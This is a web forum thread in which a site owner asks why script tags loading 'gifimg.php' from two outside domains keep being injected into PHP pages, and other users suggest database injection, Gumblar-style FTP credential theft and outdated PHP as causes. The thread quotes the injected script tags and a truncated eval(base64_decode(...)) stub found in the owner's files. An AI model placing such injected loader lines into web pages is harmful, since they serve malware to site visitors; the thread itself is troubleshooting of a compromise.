Recently, they again appeared. Between the closure of the head tag (</head>) and the start of the body tag(<body>) the following code is added automatically:
<script src=http://hilalgroup.com/images/gifimg.php ></script> <script src=http://pianotainment.com/images/gifimg.php ></script>
Can anyone throw a light upon? My site is being blacklisted by Chrome.
Could it be coming from the database that is if your site is using a database?
I'm using a database indeed. But the portion where the code is inserted does not contain any database print. The code of the page is like:
<?php require 'template/header.php'; ?>
[B][COLOR="DarkRed"](THE CODE IS INSERTED HERE)[/COLOR][/B]
<?php require 'template/top.php'; ?>
<?php require 'category_list.php'; ?>
<?php require 'product_display.php'; ?>
Check to see if a user figured out a way to enter info into your database.
But how (and from where) can it be injected in such a place where the actual code is clean (does not have any echo/print/document.write there)?
Some more details of the error:
FTP could be another hack, Gumblar works on the princple that the file download offered (usually a pdf) is the infection point and what steals passwords and logins to FTP and then logs in, grabs the index page, modifies it and then uploads back to the server.
(SO go now, change your login to your server, if that cures it, then consider moving all your development to a separate user account on your computer and keep one user account for web surfing, etc. Safest policy if you work on one machine but also surf from it)
check with the web host company that they have not done this or if the server has been compromised by a new client, etc. Poor back end security and a buggy PHP and SQL all go miles to helping the hackers.
Check what PHP and SQL versions your running on. Your hosts running PHP < 5.0 then you possibly are being hacked through PHP itself from a known security bug that allows for server-side hacks to be made. MySQL is another technology that people will hack and inject data in to if they find hackable or exploitable PHP installs.
So start asking questions of your host and if they have any server-side firewalls, I am not talking about what is on the outside but internals, do they have a firewall policy between servers and networks connected to them or are they an eggs in one basket host? (in it for the money)
Tell you hosting provider about the problem and they should be able to help you figure it out.
Thanks for your response. Some extra code was added into some PHP files as:
Again, a lot of thanks to you all for taking out your time and replying.
<?php eval(base64_decode('....'); ?>
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
Tags for this Thread